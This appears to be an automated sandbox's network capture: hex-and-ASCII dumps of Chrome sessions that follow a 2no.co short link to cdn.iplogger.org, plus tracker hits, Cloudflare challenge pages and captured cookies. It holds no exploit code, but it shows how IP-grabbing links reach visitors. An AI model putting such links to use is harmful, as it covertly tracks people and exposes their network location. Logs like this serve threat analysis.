                                                                                2024-07-29 22:54:44 UTC1369INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 68 65 69 67 68 74 3a 20 36 30 30 70 78 29 2c 0a 0a 7d 0a 0a 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 36 30 30 70 78 29 20 7b 0d 09 70 2c 20 75 6c 20 6c 69 2c 20 6f 6c 20 6c 69 2c 20 61 20 7b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 25 21 69 6d 70 6f 72 74 61 6e 74 20 7d 0a 09 68 31 2c 20 68 32 2c 20 68 33 2c 20 68 31 20 61 2c 20 68 32 20 61 2c 20 68 33 20 61 20 7b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 32 30 25 20 7d 0a 09 68 31 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 34 32 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 20 7d 0a 09 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a
                                                                                Data Ascii: only screen and (max-height: 600px),}@media only screen and (max-width:600px) {p, ul li, ol li, a { line-height:150%!important }h1, h2, h3, h1 a, h2 a, h3 a { line-height:120% }h1 { font-size:42px!important; text-align:center }h2 { font-size:
                                                                                2024-07-29 22:54:44 UTC1369INData Raw: 75 62 6d 69 74 22 3e 0a 09 09 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 3e 0a 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6b 65 79 22 20 76 61 6c 75 65 3d 22 75 6e 69 6b 65 79 5f 31 31 31 61 66 34 62 30 66 38 66 34 30 33 30 39 32 33 62 32 33 63 61 66 66 35 38 65 64 65 66 37 66 65 37 65 38 34 34 65 66 62 65 35 37 61 33 63 35 62 38 66 64 63 65 31 32 31 39 64 37 66 38 64 22 3e 0a 09 09 09 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 6f 6b 22 20 6e 61 6d 65 3d 22 63 6f 6e 73 65 6e 74 22 20 76 61 6c 75 65 3d 22 31 22 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 3e 41 67 72 65 65 20 26 20 43 6f 6e 74 69 6e 75 65 3c 2f 62 75 74 74 6f 6e 3e 0a 0a 09 09 09 3c 64 69 76 20 63 6c
                                                                                Data Ascii: ubmit"><form action="" method="POST"><input type="hidden" name="key" value="unikey_111af4b0f8f4030923b23caff58edef7fe7e844efbe57a3c5b8fdce1219d7f8d"><button class="ok" name="consent" value="1" type="submit">Agree & Continue</button><div cl
                                                                                2024-07-29 22:54:44 UTC51INData Raw: 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: .body.appendChild(a);</script></body></html>
                                                                                2024-07-29 22:54:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.949719104.21.4.2084437716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-29 22:54:44 UTC588OUTGET /redirect/handshake.png HTTP/1.1
                                                                                Host: cdn.iplogger.org
                                                                                Connection: keep-alive
                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                sec-ch-ua-mobile: ?0
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                sec-ch-ua-platform: "Windows"
                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                Sec-Fetch-Site: cross-site
                                                                                Sec-Fetch-Mode: no-cors
                                                                                Sec-Fetch-Dest: image
                                                                                Referer: https://2no.co/
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                2024-07-29 22:54:45 UTC1285INHTTP/1.1 403 Forbidden
                                                                                Date: Mon, 29 Jul 2024 22:54:44 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                Cross-Origin-Resource-Policy: same-origin
                                                                                Origin-Agent-Cluster: ?1
                                                                                Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                Referrer-Policy: same-origin
                                                                                X-Content-Options: nosniff
                                                                                X-Frame-Options: SAMEORIGIN
                                                                                cf-mitigated: challenge
                                                                                2024-07-29 22:54:45 UTC695INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 57 6f 42 4f 78 66 5a 59 70 41 6f 6d 4e 66 6b 43 77 6d 4d 38 2f 79 71 30 5a 57 6f 67 6c 42 7a 69 34 32 4c 55 6e 67 4a 4a 6a 39 72 77 51 42 47 75 2b 64 57 69 58 63 68 78 59 76 4f 47 4c 51 69 4b 6c 68 78 61 53 77 2b 63 4f 32 6d 54 4f 76 44 76 2b 61 6a 4c 6c 56 48 7a 59 39 4a 66 49 31 4a 56 5a 67 52 47 69 6d 6f 6c 57 4e 77 3d 24 34 66 65 69 4d 78 36 6a 49 52 5a 4c 2b 7a 78 79 59 63 46 4f 51 51 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                                                                Data Ascii: cf-chl-out: WoBOxfZYpAomNfkCwmM8/yq0ZWoglBzi42LUngJJj9rwQBGu+dWiXchxYvOGLQiKlhxaSw+cO2mTOvDv+ajLlVHzY9JfI1JVZgRGimolWNw=$4feiMx6jIRZL+zxyYcFOQQ==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                                                                2024-07-29 22:54:45 UTC1369INData Raw: 33 65 66 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                                                Data Ascii: 3efd<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                                                                2024-07-29 22:54:45 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                                                                Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.94972088.212.201.1984437716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-29 22:54:45 UTC665OUTGET /hit?t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.7654828449535682 HTTP/1.1
                                                                                Host: counter.yadro.ru
                                                                                Connection: keep-alive
                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                sec-ch-ua-mobile: ?0
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                sec-ch-ua-platform: "Windows"
                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                Sec-Fetch-Site: cross-site
                                                                                Sec-Fetch-Mode: no-cors
                                                                                Sec-Fetch-Dest: image
                                                                                Referer: https://2no.co/
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                2024-07-29 22:54:45 UTC602INHTTP/1.1 302 Moved Temporarily
                                                                                Server: nginx/1.17.9
                                                                                Date: Mon, 29 Jul 2024 22:54:45 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 32
                                                                                Connection: close
                                                                                Location: https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.7654828449535682
                                                                                Expires: Sun, 30 Jul 2023 21:00:00 GMT
                                                                                Pragma: no-cache
                                                                                Cache-control: no-cache
                                                                                P3P: policyref="/w3c/p3p.xml", CP="UNI"
                                                                                Set-Cookie: FTID=1cg1sr1pFper1cg1sr001FMX; path=/; expires=Tue, 29 Jul 2025 21:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
                                                                                Strict-Transport-Security: max-age=86400
                                                                                2024-07-29 22:54:45 UTC32INData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 4d 6f 76 65 64 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <html><body>Moved</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.94972635.190.80.14437716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-29 22:54:45 UTC539OUTOPTIONS /report/v4?s=CPqke8krabWr3I%2B0nQZrM2XBTRh85vl2pABTFNCSidoCLsuM%2FwVtGNU4ahZho4qN%2FuYUTKxo7XbgrVq19ZYo%2BAluOfIfzCfoAkvjHeJWNGUJK1LfDJpl%2BO7HYJ7smmPZAP9B HTTP/1.1
                                                                                Host: a.nel.cloudflare.com
                                                                                Connection: keep-alive
                                                                                Origin: https://cdn.iplogger.org
                                                                                Access-Control-Request-Method: POST
                                                                                Access-Control-Request-Headers: content-type
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                2024-07-29 22:54:45 UTC336INHTTP/1.1 200 OK
                                                                                Content-Length: 0
                                                                                access-control-max-age: 86400
                                                                                access-control-allow-methods: POST, OPTIONS
                                                                                access-control-allow-origin: *
                                                                                access-control-allow-headers: content-type, content-length
                                                                                date: Mon, 29 Jul 2024 22:54:45 GMT
                                                                                Via: 1.1 google
                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                Connection: close


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.94972835.190.80.14437716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-29 22:54:46 UTC480OUTPOST /report/v4?s=CPqke8krabWr3I%2B0nQZrM2XBTRh85vl2pABTFNCSidoCLsuM%2FwVtGNU4ahZho4qN%2FuYUTKxo7XbgrVq19ZYo%2BAluOfIfzCfoAkvjHeJWNGUJK1LfDJpl%2BO7HYJ7smmPZAP9B HTTP/1.1
                                                                                Host: a.nel.cloudflare.com
                                                                                Connection: keep-alive
                                                                                Content-Length: 422
                                                                                Content-Type: application/reports+json
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                2024-07-29 22:54:46 UTC422OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 37 35 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 32 6e 6f 2e 63 6f 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 34 2e 32 30 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 63 64
                                                                                Data Ascii: [{"age":0,"body":{"elapsed_time":752,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://2no.co/","sampling_fraction":1.0,"server_ip":"104.21.4.208","status_code":403,"type":"http.error"},"type":"network-error","url":"https://cd
                                                                                2024-07-29 22:54:46 UTC168INHTTP/1.1 200 OK
                                                                                Content-Length: 0
                                                                                date: Mon, 29 Jul 2024 22:54:46 GMT
                                                                                Via: 1.1 google
                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                Connection: close


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.94972788.212.201.1984437716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-29 22:54:46 UTC706OUTGET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.7654828449535682 HTTP/1.1
                                                                                Host: counter.yadro.ru
                                                                                Connection: keep-alive
                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                sec-ch-ua-mobile: ?0
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                sec-ch-ua-platform: "Windows"
                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                Sec-Fetch-Site: cross-site
                                                                                Sec-Fetch-Mode: no-cors
                                                                                Sec-Fetch-Dest: image
                                                                                Referer: https://2no.co/
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Cookie: FTID=1cg1sr1pFper1cg1sr001FMX
                                                                                2024-07-29 22:54:46 UTC481INHTTP/1.1 200 OK
                                                                                Server: nginx/1.17.9
                                                                                Date: Mon, 29 Jul 2024 22:54:46 GMT
                                                                                Content-Type: image/gif
                                                                                Content-Length: 445
                                                                                Connection: close
                                                                                Expires: Sun, 30 Jul 2023 21:00:00 GMT
                                                                                Pragma: no-cache
                                                                                Cache-control: no-cache
                                                                                P3P: policyref="/w3c/p3p.xml", CP="UNI"
                                                                                Set-Cookie: VID=2DNPIG0nbdur1cg1ss001FSz; path=/; expires=Tue, 29 Jul 2025 21:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
                                                                                Access-Control-Allow-Origin: *
                                                                                Strict-Transport-Security: max-age=86400
                                                                                2024-07-29 22:54:46 UTC445INData Raw: 47 49 46 38 37 61 1f 00 1f 00 d5 00 00 02 02 02 82 56 06 da be 86 42 2e 0a c2 82 02 22 1a 06 a2 6a 06 32 26 08 62 42 06 de ae 42 fa de a1 b2 76 02 5a 4e 3e ea a2 16 2a 26 1a ee d6 aa 52 36 06 2a 22 0a da a2 2a 3a 26 08 94 62 06 da 92 02 a6 72 12 26 22 0b ac 72 02 4a 2e 0a ca 86 02 72 4a 06 fe de 9e ba 7a 02 f2 de ae 24 1e 0e 36 26 08 fe de 9a fe ba 32 fe c6 52 fe aa 02 5e 3e 08 8e 5e 06 9e 6a 06 7e 52 06 f2 da b2 4e 36 0a 6a 46 06 f7 de a6 26 1e 0a a5 6e 02 f2 da ae 56 3a 0a 3e 2a 08 de 96 06 4e 32 06 86 5a 06 46 2e 06 c6 86 02 b6 7a 02 2e 22 08 96 66 06 ae 76 02 ce 8a 02 76 4e 06 bc 7e 02 f6 de aa c6 82 02 2c 00 00 00 00 1f 00 1f 00 00 06 e2 c0 10 67 a8 28 16 59 48 96 6f e9 f3 bc 9e d0 94 54 fa 48 84 46 a4 ac 76 cb ed 76 1b 94 ab 77 4c d6 6a c2 d8 b2 9a
                                                                                Data Ascii: GIF87aVB."j2&bBBvZN>*&R6*"*:&br&"rJ.rJz$6&2R^>^j~RN6jF&nV:>*N2ZF.z."fvvN~,g(YHoTHFvvwLj


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.949730184.28.90.27443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-29 22:54:47 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept: */*
                                                                                Accept-Encoding: identity
                                                                                User-Agent: Microsoft BITS/7.8
                                                                                Host: fs.microsoft.com
                                                                                2024-07-29 22:54:47 UTC467INHTTP/1.1 200 OK
                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                Content-Type: application/octet-stream
                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                Server: ECAcc (chd/073B)
                                                                                X-CID: 11
                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                X-Ms-Region: prod-eus-z1
                                                                                Cache-Control: public, max-age=202098
                                                                                Date: Mon, 29 Jul 2024 22:54:47 GMT
                                                                                Connection: close
                                                                                X-CID: 2


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                8192.168.2.949731104.21.4.2084437716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-29 22:54:47 UTC577OUTGET /favicon.ico HTTP/1.1
                                                                                Host: cdn.iplogger.org
                                                                                Connection: keep-alive
                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                sec-ch-ua-mobile: ?0
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                sec-ch-ua-platform: "Windows"
                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                Sec-Fetch-Site: cross-site
                                                                                Sec-Fetch-Mode: no-cors
                                                                                Sec-Fetch-Dest: image
                                                                                Referer: https://2no.co/
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                2024-07-29 22:54:47 UTC751INHTTP/1.1 200 OK
                                                                                Date: Mon, 29 Jul 2024 22:54:47 GMT
                                                                                Content-Type: image/x-icon
                                                                                Content-Length: 2833
                                                                                Connection: close
                                                                                last-modified: Tue, 07 Jun 2022 11:44:38 GMT
                                                                                etag: "629f3a26-b11"
                                                                                strict-transport-security: max-age=31536000
                                                                                x-frame-options: SAMEORIGIN
                                                                                Cache-Control: max-age=14400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 6365
                                                                                Accept-Ranges: bytes
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PlE%2B6qB6X7ozUoxmrFrzrXnvmROT047LP6h4QrtpI4JgpQp73Na0j7Gm3uMsWw3tBq1axJF67Ixn0IvWpeyNirqpjoAbHEycXcSrjg46YORsWZ4fE8lQNYJX8qw9YugLBIfZ"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ab0b15a8ab24385-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                2024-07-29 22:54:47 UTC618INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 0a d8 49 44 41 54 78 9c dd 9b 7f 8c db 65 1d c7 5f 4f 73 6d 97 cb 85 bb 2c 75 59 96 73 59 49 9d 77 c7 24 c8 0c d1 8d 8e 1f 0a 0c b0 18 98 3a 56 6a 44 c6 cf 21 82 80 01 6f 25 86 ac 14 f9 35 24 82 0a a2 a0 d6 ca cf 09 96 20 28 99 93 3b 7e 38 06 22 ce eb c4 ba ce cb b2 10 68 2e bb cb 72 b9 5e 2f 7d fc e3 f3 7c d7 de 71 6d bf 4f af 77 18 df 49 f3 6d da ef e7 f9 3e cf e7 79 3e bf 3f 5f c5 02 c1 9b ce 3b 5f 3d c0 62 80 52 34 58 88 e5 34 c0 32 e0 88 f9 94 53 21 b5 50 d3 a2 6d 3e 07 f7 a6 f3 1d c0 2a 60 0d b0 1a e8 01 96 03 ed 40 1a b8 cc cc e1 4f 08 13 c6 80 5c 2c a7 f7 01 6f 00 83 40 2e 15 52 53 f3 35 c7 96 33 c0 9b ce b7 03 eb 81 4d c0 a9 40 a0 c6 ad 9e aa
                                                                                Data Ascii: PNGIHDR@@iqIDATxe_Osm,uYsYIw$:VjD!o%5$ (;~8"h.r^/}|qmOwIm>y>?_;_=bR4X42S!Pm>*`@O\,o@.RS53M@
                                                                                2024-07-29 22:54:47 UTC1369INData Raw: a6 0b 38 13 b8 06 61 56 23 bc 0a 7c 3e 15 52 13 b3 fd 39 2b 03 bc e9 bc 0f 09 50 1a 1e a1 1a 98 04 7e 09 dc 5e 8a 06 f7 3b 3f fa 23 71 90 e3 b9 14 d9 c9 0e 64 87 47 80 61 60 a4 98 49 b8 f2 f5 63 39 dd 06 5c 0a dc 43 63 27 2c 09 6c 9d 2d ca ac c5 80 eb cd c0 cd e0 6d e4 48 ef 2e 45 83 ce a2 bb 81 0b 80 73 11 73 b5 98 e9 3a a0 6c 3e c3 c0 d5 c5 4c e2 05 00 ad 75 1b b2 db 67 23 51 e4 08 30 00 3c a5 94 1a 33 9a 7e 3d 62 9a eb b9 c5 93 c0 da 54 48 ed 99 f9 c7 87 18 e0 4d e7 bb 11 f7 f6 18 d7 4b ae e0 61 e0 da 52 34 38 0e e0 8f c4 57 02 5b 81 af 36 98 a0 83 3f 00 e7 16 33 89 29 ad f5 72 e0 57 48 64 38 13 07 81 6f 28 a5 5e 02 88 e5 f4 8d c0 5d 0d c6 7e 15 38 65 66 34 39 8d 01 46 eb ff 0c b8 c4 c5 64 ab 51 46 16 7a 67 29 1a 2c fb 23 f1 45 c0 2d 88 05 71 1b b0 4c
                                                                                Data Ascii: 8aV#|>R9+P~^;?#qdGa`Ic9\Cc',l-mH.Ess:l>Lug#Q0<3~=bTHMKaR48W[6?3)rWHd8o(^]~8ef49FdQFzg),#E-qL
                                                                                2024-07-29 22:54:47 UTC846INData Raw: 1e 78 26 03 f6 21 b6 dd 16 97 63 62 84 62 26 f1 1e 70 16 92 d9 6d 45 3b eb 7e e0 4b c0 b7 8b 99 c4 64 b2 a0 bb 80 67 99 bd 4d cf 83 e4 fc ff 0a dc 9e 2c e8 2e a3 1f d2 48 0a 6c 93 c9 1c 1d c5 6c e5 f1 15 88 97 e4 36 de 9f 00 ce 2e 45 83 bb 7a 07 46 3d 80 2f 1b ee 9c 00 30 85 d2 9b 90 82 ab 6d b9 fd 00 f0 43 e0 a1 62 26 71 04 20 59 d0 3d 88 b2 76 eb f2 1e 44 aa d4 a9 fe c0 ec 4d d6 b5 1a 24 6e c6 5d 6f 90 d3 df f3 70 e8 e3 8b 41 3a 36 6e 40 52 da bb b2 e1 4e a7 41 22 80 14 25 23 88 e5 58 86 ec 96 a7 6a 9c 29 c4 b1 1a 44 76 78 67 95 99 23 59 d0 01 20 4b 73 3d 8a 83 c0 19 fd 81 0f b7 c9 d4 ca 06 6d 47 ec 6a a3 2a ef 76 e0 e1 52 34 08 03 a3 5f 40 76 6c 11 92 d4 dc d1 3b 30 ba 0d d8 9b 0d 77 16 10 65 f9 a8 3f 12 f7 21 a7 61 99 b9 3a 2d 32 87 80 23 26 c6 00 a0
                                                                                Data Ascii: x&!cbb&pmE;~KdgM,.Hll6.EzF=/0mCb&q Y=vDM$n]opA:6n@RNA"%#Xj)Dvxg#Y Ks=mGj*vR4_@vl;0we?!a:-2#&


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                9192.168.2.94973288.212.201.1984437716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-07-29 22:54:47 UTC510OUTGET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.7654828449535682 HTTP/1.1
                                                                                Host: counter.yadro.ru
                                                                                Connection: keep-alive
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                Accept: */*
                                                                                Sec-Fetch-Site: none
                                                                                Sec-Fetch-Mode: cors
                                                                                Sec-Fetch-Dest: empty
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Cookie: FTID=1cg1sr1pFper1cg1sr001FMX; VID=2DNPIG0nbdur1cg1ss001FSz
